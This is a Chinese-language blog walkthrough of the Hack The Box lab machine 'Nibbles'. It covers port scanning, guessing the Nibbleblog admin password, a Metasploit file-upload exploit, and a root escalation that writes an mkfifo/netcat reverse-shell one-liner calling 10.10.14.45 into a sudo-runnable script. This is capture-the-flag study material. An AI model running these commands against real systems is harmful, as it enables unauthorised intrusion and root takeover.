Nibbles

Posted by admin on 2020年2月21日

Nibbles

zenmap扫描端口

file

80端口源码

file

访问：http://10.10.10.75/nibbleblog/

file

Google：nibbleblog exploit
此exp需要使用用户名和密码

file

dirb http://10.10.10.75 -r
扫描出content目录

访问：http://10.10.10.75/nibbleblog/content/private/users.xml
用户名：admin
密码靠口令猜解：nibbles

file

use msfconsole
get nibbler shell

use exploit/multi/http/nibbleblog_file_upload
set lhost 10.10.14.45
set rhost 10.10.10.75
set username admin
set password nibbles
set targeturi /nibbleblog
exploit

file

get user.txt

cd /home
cd nibbler
cat user.txt

file

get tty shell

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ls

file

sudo -l

file

unzip personal.zip

file

msf生成netcat reverse shell

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.45 lport=5555 R
nc -lvp 5555

file

靶机执行如下命令，get root shell

cd /home/nibbler/personal/stuff/
echo "mkfifo /tmp/jswwrii; nc 10.10.14.45 5555 0</tmp/jswwrii | /bin/sh >/tmp/jswwrii 2>&1; rm /tmp/jswwrii" > monitor.sh
sudo -u root ./monitor.sh

get root.txt

file

发表评论取消回复

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据。

Smi1e's Blog

Primary penetration testing engineer

Nibbles

Nibbles

发表评论取消回复

Smi1e's Blog

Primary penetration testing engineer

Nibbles

Nibbles

发表评论 取消回复

发表评论取消回复